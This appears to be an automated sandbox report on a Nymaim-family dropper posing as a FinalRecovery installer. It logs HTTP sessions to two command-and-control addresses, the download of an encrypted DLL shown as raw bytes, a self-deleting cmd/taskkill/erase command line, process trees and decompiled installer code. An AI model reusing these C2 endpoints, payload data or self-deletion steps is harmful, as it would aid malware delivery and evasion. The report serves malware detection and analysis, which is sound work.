Jan 25, 2023 10:02:03.906924009 CET	93	IN	HTTP/1.1 200 OK Date: Wed, 25 Jan 2023 09:02:03 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49708	45.12.253.72	80	C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Timestamp	kBytes transferred	Direction	Data
Jan 25, 2023 10:02:03.965511084 CET	94	OUT	GET /default/stuk.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: OK Host: 45.12.253.72 Connection: Keep-Alive Cache-Control: no-cache
Jan 25, 2023 10:02:03.992405891 CET	94	IN	HTTP/1.1 200 OK Date: Wed, 25 Jan 2023 09:02:03 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 21 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 6b 76 51 6f 52 71 74 63 43 79 4d 74 48 6d 51 79 51 58 4f 55 75 Data Ascii: kvQoRqtcCyMtHmQyQXOUu
Jan 25, 2023 10:02:04.017834902 CET	95	OUT	GET /default/puk.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: OK Host: 45.12.253.72 Connection: Keep-Alive Cache-Control: no-cache
Jan 25, 2023 10:02:04.044833899 CET	96	IN	HTTP/1.1 200 OK Date: Wed, 25 Jan 2023 09:02:04 GMT Server: Apache/2.4.41 (Ubuntu) Pragma: public Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Cache-Control: private Content-Disposition: attachment; filename="fuckingdllENCR.dll"; Content-Transfer-Encoding: binary Content-Length: 95248 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: f9 17 27 6d cd b4 92 68 0d 66 7b 51 7b ad 1c 37 5f 16 01 ee f3 6c ae f2 2f 09 dd 14 d1 33 60 9a 70 b7 24 0a 1c e2 2e 05 5d ab bb 9c 09 7e 40 d6 d5 56 74 d6 25 0c 07 65 42 d1 39 61 e4 e7 2f 5f 8e bc ea 47 de 02 0f 7c 97 4f ac 86 30 48 47 60 ad b8 b4 11 a3 9a 60 af b0 06 20 6b c9 98 81 78 23 f4 29 c3 1e da aa f7 f1 57 88 c2 91 6e 05 10 d3 3b 0b 76 6d 4e f1 b7 c8 14 bc 54 1b ad 3a 6c dd bb 0c 9f cf 07 cf aa 93 ed 14 14 d2 33 37 72 85 15 b8 2f 97 bf 58 aa 31 2c f6 81 29 ba 05 5e ce 98 59 95 0d bf b4 4e be 7b 38 b8 7f b6 c8 b4 aa e8 9b e7 be bb d5 3d f9 ce a0 52 b3 06 45 09 7a 8e 63 b7 f5 47 b0 7e 58 cd 30 02 7d c7 62 d1 a1 04 00 ef 72 45 b3 f7 64 d4 ed 0a df 88 1d 9c ff bf a7 8f e3 93 28 b3 b7 ff 4d 60 e0 4f c0 59 cc a7 a2 f8 80 3f 7f de ff 15 44 ee 9d 13 97 52 06 19 11 9c 4e e7 b1 1a 93 43 dd 8f 7b a0 ef 45 d9 5c 69 a0 0d d0 ea 1e d6 d2 3a 13 68 99 13 ee 23 95 ad 5c cd dc d5 64 14 84 81 2a 4f 84 f1 22 ee 8f ef 4e 07 79 77 14 32 06 24 f4 0b 4c e4 7b a8 05 9b ec 8d 5b 77 5c 95 b2 07 fc 76 14 97 01 9e fc 7a 6d 14 14 d5 e2 39 de 98 7c 84 71 f3 f3 a5 da 70 b4 08 dd 11 6a b9 57 66 51 02 35 68 5e 72 59 bf 72 fd 2d 81 9e 5e 7d 67 02 d9 94 9b 10 e8 d4 fe 5d 25 9e d9 1f 45 6c cc 39 38 51 03 9b 35 46 29 a4 46 07 91 ac 29 0c 4b 42 44 0e ec 8f 3c 30 83 90 6c 37 c6 b0 c1 c6 3a eb 88 8b d2 83 21 db f0 0c 2e 94 4c 1b 87 50 af 6c d4 16 6f 56 8a e2 d5 df 68 dc f5 7e 3b ac 47 0e 9e 4b e6 ba 12 f5 b9 2d d9 c9 a7 3d 7b e9 dc 1f 05 06 55 00 25 0e 83 1b 7e b4 28 82 44 45 f3 00 38 f3 f1 64 66 e9 2f f7 9e ef 6e 8f 0a 1b 46 43 00 8f 12 f9 7e 23 ab 60 eb 89 61 d0 ba a2 bb 19 d9 11 81 d3 42 92 72 d1 ee 4f 4a 5e 2d f4 dd 01 24 eb 28 60 d9 c0 1a 4e ba ce 2a 6b 0e b8 e6 02 50 8b a2 68 17 83 de 04 81 2b 15 6f c7 0b 9f 57 fe 6d a0 30 bd c8 99 88 26 6a 10 b6 f8 45 d4 f8 9c 53 69 70 89 08 70 1b 1b fc 55 88 8c 51 78 ff 8e 18 71 91 5b 0c b5 22 a7 e6 80 e6 f5 e0 cf 55 06 e1 b5 6e 7c f8 4d 65 5f d2 f8 80 50 54 cb 7c 63 12 77 74 07 08 a1 ad 35 6c 9b b7 8d 27 0b a0 66 b9 01 36 6e ee f2 93 2c 8a 2b a1 e3 a2 0d 81 34 2a a5 d3 1f f5 4a c2 5c 9f c5 2b bf c8 5c 83 98 43 f9 06 df 3a 31 1a 75 14 e1 6c a7 68 c5 f9 14 6e dd 36 03 89 35 50 81 2d 2f f1 7f a5 07 c5 0c e5 fd 6d 37 30 44 e0 c6 93 44 96 5f 1e 1d da db 9f 3f b2 e0 39 0f 2a 56 d5 b3 15 a9 4d 38 b0 98 6d 09 54 0d 5d 34 80 69 b0 49 51 4e 19 bd 15 fa 42 56 b4 eb e0 22 68 a6 86 1b 82 b7 b6 14 66 fa fe 90 d5 0d f8 56 c5 28 81 da 57 b4 0d 48 e1 60 2c e7 a3 56 60 af ec 6c 1e 3b ad f2 fc 7d c3 40 f9 ce bb 16 8d fe 1a b2 2a fb c6 72 44 8b 84 d7 01 36 4f 50 d9 4f 43 23 5e 10 b4 08 12 1b d5 3d 5e 37 ed 85 52 17 e1 00 74 78 f4 0d 51 3c c6 a3 d3 8c 4a 0f b0 6f 9b 6e Data Ascii: 'mhf{Q{7_l/3`p$.]~@Vt%eB9a/_G\|O0HG`` kx#)Wn;vmNT:l37r/X1,)^YN{8=REzcG~X0}brEd(M`OY?DRNC{E\i:h#\dO"Nyw2$L{[w\vzm9\|qpjWfQ5h^rYr-^}g]%El98Q5F)F)KBD<0l7:!.LPloVh~;GK-={U%~(DE8df/nFC~#`aBrOJ^-$(`NkPh+oWm0&jESippUQxq["Un\|Me_PT\|cwt5l'f6n,+4J\+\C:1ulhn65P-/m70DD_?9VM8mT]4iIQNBV"hfV(WH`,V`l;}@*rD6OPOC#^=^7RtxQ<Jon
Jan 25, 2023 10:02:04.044881105 CET	97	IN	Data Raw: b9 13 71 db 4f 0e 15 66 e7 46 c7 02 cf f6 29 eb 59 32 76 ea e8 b3 49 ca 8c aa d5 67 ee 6c 6e 56 0d 58 a2 14 73 6d de 3e 1b e9 8d ea 8d a1 e4 5e 65 4f 80 6c d9 a5 c8 d2 14 c5 45 42 e8 82 d5 17 75 1b 6d 0b 45 c1 7c 95 58 93 ff a3 29 62 20 37 c7 4b Data Ascii: qOfF)Y2vIglnVXsm>^eOlEBumE\|X)b 7Kma"%tpU\LA:_@c3[mG\|!H.a${K"!k\Qq:C"D`}.z"7\|KS=mkhiiR&,MU
Jan 25, 2023 10:02:04.044971943 CET	99	IN	Data Raw: b8 1a dd 12 6a 63 22 75 53 e8 6b 72 e2 65 3c 8c 7a 9b 4c 78 8c 17 82 80 83 7e d8 ad 93 53 59 37 ad 82 77 06 e7 05 c5 f1 a8 22 05 6e f9 c9 ae b7 a0 dd 89 8b 25 98 9e 5d 33 04 b2 58 9f 6a 8c 7f 18 91 fa c9 91 95 1f 4f 82 57 93 11 90 f4 b3 2e 7e 33 Data Ascii: jc"uSkre<zLx~SY7w"n%]3XjOW.~3Z-jTwlps5~5r~yWitQCn5B#Gk;y^zg9Kx/Q0RW5\|R:K@!2om
Jan 25, 2023 10:02:04.045028925 CET	100	IN	Data Raw: 82 0e 3a 85 40 47 64 e9 c9 eb ed ad 96 1a 7f 35 cc aa f6 e3 81 91 4a f0 88 37 75 b8 56 f3 f5 42 7c ff 91 2f d1 bc 64 a9 be 28 ac 38 81 a1 71 e1 cc a1 05 99 f3 f2 c2 c3 8a 7c 1e 85 f4 af 71 92 af 7a 5a 6c 67 0f 0c 4e 6b e5 43 32 ec 22 ca 18 b8 f7 Data Ascii: :@Gd5J7uVB\|/d(8q\|qzZlgNkC2"=<,4^jLcjkSRqNr$f%]*Qrp$^2}!Ff!zTNv>fRu&Y45B!F3_T2+qT>)r
Jan 25, 2023 10:02:04.045144081 CET	101	IN	Data Raw: b7 9c a5 c7 b4 13 59 4c 89 e7 7c c9 80 cf 4f 07 34 85 f7 e2 26 20 15 84 d6 ae b3 ba f2 5a ba ad f3 ed 1e 17 92 2d 9a 0b 50 0e ff d8 f1 a0 f9 4b ab ed 3e 1f b6 c9 56 f6 a9 65 3d be c8 b0 38 bb 71 41 ed 5f d9 45 2d c0 00 9d 41 b1 97 dc 66 ef 3b ff Data Ascii: YL\|O4& Z-PK>Ve=8qA_E-Af;V\VVWCbe+S,eu{@,]%>/}Yc(-(KQ!&[:\x20iG6w,3WV]s6Xrf%GLC"e`0@
Jan 25, 2023 10:02:04.045197964 CET	103	IN	Data Raw: 11 d8 4d 3a d6 dd 89 59 cd 0b 16 a1 5c e0 b1 82 41 56 1f 2d 8a 9b 34 a6 7a 93 38 50 c7 99 d8 3a 5a cb 51 23 16 57 7a b1 29 e4 f4 36 d6 b8 5d 77 4a 95 67 c8 69 0e 2c f6 00 e4 e2 0b c1 d7 d5 91 fb 80 69 e7 91 29 a8 5a 8d f7 57 80 64 35 2e fd 18 f6 Data Ascii: M:Y\AV-4z8P:ZQ#Wz)6]wJgi,i)ZWd5.s)k%>Zddu!QYWFNH;}lKX~u)^y.]BuZoZ]2-?,56DRX[`LPCz/V!f4d'1+9IC
Jan 25, 2023 10:02:04.045277119 CET	104	IN	Data Raw: 1b 1f 1e 44 b1 ea d8 45 04 ab b8 d9 e9 5b 76 e7 0f b9 a3 47 a5 21 f4 b1 e2 9c 7f e3 62 48 c7 27 08 83 60 37 7a 83 bb 17 e4 3b 24 46 2f 8a 1e b7 ec 06 8b 63 c4 b9 c0 d8 4b 6e 9a d9 e6 ea d5 c3 7a f9 d3 5c 3a f0 ac bf 17 aa a3 24 37 46 f0 00 17 c6 Data Ascii: DE[vG!bH'`7z;$F/cKnz\:$7FT% "!!1w{AdD[hQcwWR<S[lrb0}q`XogG k{6Z\F{jl/0b1r.0-w?I-EiJ]QZt.
Jan 25, 2023 10:02:04.045353889 CET	106	IN	Data Raw: 15 aa c4 ac c1 28 5e 30 c8 d8 1b 87 a6 86 ce 81 94 ff bb 78 a0 94 2c f7 b8 83 70 db 10 39 6c 7f 79 51 5c da 40 ba 8b d9 87 9d 63 9a 86 af 24 46 fe 58 1e 56 e3 76 ae 65 f3 8a 9e a2 15 92 97 81 c9 4f e6 89 39 a3 7f 20 cf d1 76 d3 7a fb 17 71 5b 15 Data Ascii: (^0x,p9lyQ\@c$FXVveO9 vzq[SSvQZEgb39=hC(~]yk\|j(F"V[j%o$ofNn#P=:Bm#?PQ_opFE~2psDLW~ZqzH
Jan 25, 2023 10:02:04.045423031 CET	107	IN	Data Raw: 26 a5 33 19 2c f6 3d 89 23 38 0a a9 00 c9 bd 0a ef 81 a1 7b 11 01 53 c3 1b f4 ad f5 59 c4 93 b9 df 8a 2e dc ab 4a 9e 19 73 17 6a e2 09 be 31 e3 8f f4 13 d0 46 9f 93 14 67 e7 e5 a8 b0 f5 ca f7 a9 b2 d2 1a 64 34 eb d5 d0 30 ab 83 76 61 64 dd 88 9e Data Ascii: &3,=#8{SY.Jsj1Fgd40vadgF;3rx{(hbu/,Ty*}s3R5/.#]zzZNRUr&tJ{fap[>2?7'61-346(B`\|?c^owJmqB
Jan 25, 2023 10:02:04.045476913 CET	108	IN	Data Raw: 8a 9c e3 ed ac f9 73 a4 72 e1 6f 02 8d 58 da 38 93 56 65 c0 74 75 9d 2d 02 f2 7e 5a 55 d2 86 1c 62 e8 f4 12 48 e1 d8 56 df bc 74 da 45 c9 0f 87 28 78 ca 36 3e 1b 95 e2 ae 4f 8f e8 96 d8 57 0b da 65 ed f5 3a b8 dc 7a fb e9 ff 6e d7 8f 7b 2b 0e 53 Data Ascii: sroX8Vetu-~ZUbHVtE(x6>OWe:zn{+S~P)wU,h.Gu0,<m!ANyRl`'S6iCM.q5rR1e.p7&e"/-$l 9} u)u
Jan 25, 2023 10:02:04.072855949 CET	110	IN	Data Raw: d6 ab 4f aa bb 0e d9 dd 8d 70 17 60 be 8b 11 23 87 57 fd 44 08 45 b2 3f 9d 03 c9 b2 be 1e 4c f7 ab a2 11 24 29 8d 37 57 ca 32 12 c1 b7 01 68 9c 8d 74 77 0c a8 14 0e dd b8 8d fa 88 0c 62 4e dd b5 39 b5 60 49 06 2f ec b7 7b d0 82 6d 31 88 cb 7e 7b Data Ascii: Op`#WDE?L$)7W2htwbN9`I/{m1~{.M@%]?{T?P+(;9@&1\GHIys=pk!"L+k(D}Hv&H.H{#kQ<iO*b!

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49709	45.12.253.75	80	C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Timestamp	kBytes transferred	Direction	Data
Jan 25, 2023 10:02:04.197102070 CET	197	OUT	GET /dll.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: B Host: 45.12.253.75 Connection: Keep-Alive Cache-Control: no-cache
Jan 25, 2023 10:02:04.930826902 CET	197	IN	HTTP/1.1 200 OK Date: Wed, 25 Jan 2023 09:02:04 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Jan 25, 2023 10:02:06.997060061 CET	206	OUT	GET /dll.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: B Host: 45.12.253.75 Connection: Keep-Alive Cache-Control: no-cache
Jan 25, 2023 10:02:07.763757944 CET	206	IN	HTTP/1.1 200 OK Date: Wed, 25 Jan 2023 09:02:07 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Jan 25, 2023 10:02:09.794056892 CET	207	OUT	GET /dll.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: B Host: 45.12.253.75 Connection: Keep-Alive Cache-Control: no-cache
Jan 25, 2023 10:02:10.516107082 CET	207	IN	HTTP/1.1 200 OK Date: Wed, 25 Jan 2023 09:02:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Jan 25, 2023 10:02:12.576730967 CET	208	OUT	GET /dll.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: B Host: 45.12.253.75 Connection: Keep-Alive Cache-Control: no-cache
Jan 25, 2023 10:02:13.318223000 CET	208	IN	HTTP/1.1 200 OK Date: Wed, 25 Jan 2023 09:02:12 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Jan 25, 2023 10:02:15.544200897 CET	209	OUT	GET /dll.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: B Host: 45.12.253.75 Connection: Keep-Alive Cache-Control: no-cache
Jan 25, 2023 10:02:16.325639963 CET	209	IN	HTTP/1.1 200 OK Date: Wed, 25 Jan 2023 09:02:15 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Jan 25, 2023 10:02:18.368289948 CET	210	OUT	GET /dll.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: B Host: 45.12.253.75 Connection: Keep-Alive Cache-Control: no-cache
Jan 25, 2023 10:02:19.105379105 CET	210	IN	HTTP/1.1 200 OK Date: Wed, 25 Jan 2023 09:02:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Jan 25, 2023 10:02:21.376097918 CET	210	OUT	GET /dll.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: B Host: 45.12.253.75 Connection: Keep-Alive Cache-Control: no-cache
Jan 25, 2023 10:02:22.124958992 CET	211	IN	HTTP/1.1 200 OK Date: Wed, 25 Jan 2023 09:02:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Jan 25, 2023 10:02:24.153738976 CET	211	OUT	GET /dll.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: B Host: 45.12.253.75 Connection: Keep-Alive Cache-Control: no-cache
Jan 25, 2023 10:02:24.938194036 CET	211	IN	HTTP/1.1 200 OK Date: Wed, 25 Jan 2023 09:02:24 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Jan 25, 2023 10:02:26.967304945 CET	212	OUT	GET /dll.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: B Host: 45.12.253.75 Connection: Keep-Alive Cache-Control: no-cache
Jan 25, 2023 10:02:27.734801054 CET	212	IN	HTTP/1.1 200 OK Date: Wed, 25 Jan 2023 09:02:26 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Jan 25, 2023 10:02:29.771919966 CET	213	OUT	GET /dll.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: B Host: 45.12.253.75 Connection: Keep-Alive Cache-Control: no-cache
Jan 25, 2023 10:02:30.551927090 CET	213	IN	HTTP/1.1 200 OK Date: Wed, 25 Jan 2023 09:02:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Jan 25, 2023 10:02:32.651902914 CET	213	OUT	GET /dll.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: B Host: 45.12.253.75 Connection: Keep-Alive Cache-Control: no-cache
Jan 25, 2023 10:02:33.385802031 CET	214	IN	HTTP/1.1 200 OK Date: Wed, 25 Jan 2023 09:02:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: file.exePID: 5992, Parent PID: 3452

General

Target ID:	0
Start time:	10:01:58
Start date:	25/01/2023
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0x400000
File size:	1782938 bytes
MD5 hash:	14E09C7A5842688842F6C0BF61C17135
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: file.tmpPID: 6100, Parent PID: 5992

General

Target ID:	1
Start time:	10:01:58
Start date:	25/01/2023
Path:	C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp" /SL5="$4023C,1536639,54272,C:\Users\user\Desktop\file.exe"
Imagebase:	0x400000
File size:	712704 bytes
MD5 hash:	D76329B30DB65F61D55B20F36B56DA26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 2%, ReversingLabs
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: finalrecovery.exePID: 6076, Parent PID: 6100

General

Target ID:	2
Start time:	10:01:59
Start date:	25/01/2023
Path:	C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe"
Imagebase:	0x400000
File size:	1327103 bytes
MD5 hash:	88A9155EB9D85157634ED38D128C877B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000002.00000002.323772698.0000000003250000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: 6tohc1clzbcir.exePID: 1756, Parent PID: 6076

General

Target ID:	3
Start time:	10:02:03
Start date:	25/01/2023
Path:	C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\6tohc1clzbcir.exe
Wow64 process (32bit):	true
Commandline:
Imagebase:	0x170000
File size:	73728 bytes
MD5 hash:	3FB36CB0B7172E5298D2992D42984D06
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 60%, ReversingLabs
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 4488, Parent PID: 6076

General

Target ID:	15
Start time:	10:02:35
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c taskkill /im "finalrecovery.exe" /f & erase "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe" & exit
Imagebase:	0xb0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5040, Parent PID: 4488

General

Target ID:	16
Start time:	10:02:35
Start date:	25/01/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: taskkill.exePID: 5968, Parent PID: 4488

General

Target ID:	17
Start time:	10:02:35
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /im "finalrecovery.exe" /f
Imagebase:	0x850000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: file.exePID: 5992, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	23.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.4%
Total number of Nodes:	1507
Total number of Limit Nodes:	25

Executed Functions

Function 00409B08 Relevance: 7.6, APIs: 5, Instructions: 78
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00409B08(void* __eax) {
				char _v44;
				struct _SYSTEM_INFO _v80;
				long _v84;
				long _t17;
				long _t20;
				int _t23;
				void* _t33;
				void* _t34;
				struct _MEMORY_BASIC_INFORMATION* _t35;
				void* _t36;
				DWORD* _t37;

				_t34 = __eax;
				_t35 =  &_v44;
				GetSystemInfo( &_v80); // executed
				_t17 = VirtualQuery(_t34, _t35, 0x1c);
				if(_t17 == 0) {
					L17:
					return _t17;
				} else {
					while(1) {
						_t17 = _t35->AllocationBase;
						if(_t17 != _t34) {
							goto L17;
						}
						if(_t35->State != 0x1000 || (_t35->Protect & 0x00000001) != 0) {
							L15:
							_t17 = VirtualQuery(_t35->BaseAddress + _t35->RegionSize, _t35, 0x1c);
							if(_t17 == 0) {
								goto L17;
							}
							continue;
						} else {
							_t33 = 0;
							_t20 = _t35->Protect;
							if(_t20 == 1 || _t20 == 2 || _t20 == 0x10 || _t20 == 0x20) {
								_t23 = VirtualProtect(_t35->BaseAddress, _t35->RegionSize, 0x40, _t37); // executed
								if(_t23 != 0) {
									_t33 = 1;
								}
							}
							_t36 = 0;
							while(_t36 < _t35->RegionSize) {
								E00409B00(_t35->BaseAddress + _t36);
								_t36 = _t36 + _v80.dwPageSize;
							}
							if(_t33 != 0) {
								VirtualProtect( *_t35, _t35->RegionSize, _v84, _t37); // executed
							}
							goto L15;
						}
					}
					goto L17;
				}
			}

0x00409b0f
0x00409b11
0x00409b1a
0x00409b25
0x00409b2c
0x00409bc3
0x00409bc3
0x00409b32
0x00409bb1
0x00409bb1
0x00409bb6
0x00000000
0x00000000
0x00409b3b
0x00409b9d
0x00409ba8
0x00409baf
0x00000000
0x00000000
0x00000000
0x00409b43
0x00409b43
0x00409b45
0x00409b4b
0x00409b66
0x00409b6d
